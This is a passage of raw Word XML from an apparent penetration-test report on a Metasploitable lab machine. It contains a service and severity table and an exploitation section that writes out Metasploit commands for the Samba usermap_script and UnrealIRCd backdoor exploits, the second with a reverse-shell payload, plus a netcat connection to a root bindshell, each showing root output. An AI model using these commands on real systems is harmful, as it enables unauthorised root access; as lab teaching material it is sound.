            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">OpenSSH 4.7p1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="BF8F00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">23/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2900"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux telnetd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D9822B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">80/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2900"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Apache 2.2.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D9822B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">139/445</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Samba</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2900"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3.0.20-Debian</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1099/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Java RMI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2900"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">GNU Classpath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D9822B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1524/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Bindshell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2900"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Root backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3306/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2900"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">5.0.51a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D9822B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">5432/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2900"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">8.3.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D9822B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">5900/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">VNC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2900"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Protocol 3.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D9822B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">6667/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">IRC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2900"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">UnrealIRCd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">8180/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Tomcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2900"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Apache 5.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D9822B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 Samba usermap_script (CVE-2007-2447) — Root Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Samba 3.0.20 is vulnerable to command injection via the username field. Exploited using Metasploit to obtain immediate root-level command execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/multi/samba/usermap_script</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">set RHOSTS 192.168.100.128 / set LHOST 192.168.100.129</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">run  →  uid=0(root) gid=0(root)</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35909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5334000" cy="3590925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 4.1 — Root shell obtained via the Samba usermap_script exploit; uname -a and /etc/passwd dump confirm root access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 UnrealIRCd Backdoor (CVE-2010-2075) — Root Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">UnrealIRCd 3.2.8.1 contains a trojaned backdoor. Exploited using a Metasploit reverse shell payload to gain root access independently of the Samba vector above.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">set PAYLOAD cmd/unix/reverse</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">run  →  uid=0(root) gid=0(root)</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35528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240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 4.2 — UnrealIRCd exploit confirmed root access via uname and /etc/passwd inspection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 Port 1524 Bindshell — Instant Root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 1524 hosts a pre-installed root bind shell requiring no exploitation at all — a single netcat connection provides immediate unauthenticated root access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">nc 192.168.100.128 1524</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">root@metasploitable:/# id  →  uid=0(root) gid=0(root)</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34385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5334000" cy="3438525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 4.3 — Netstat output showing all active connections, including the exploit shells established above.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 /etc/shadow Dump &amp; Password Cracking</w:t>
      </w:r>
    </w:p>
    <w:p>
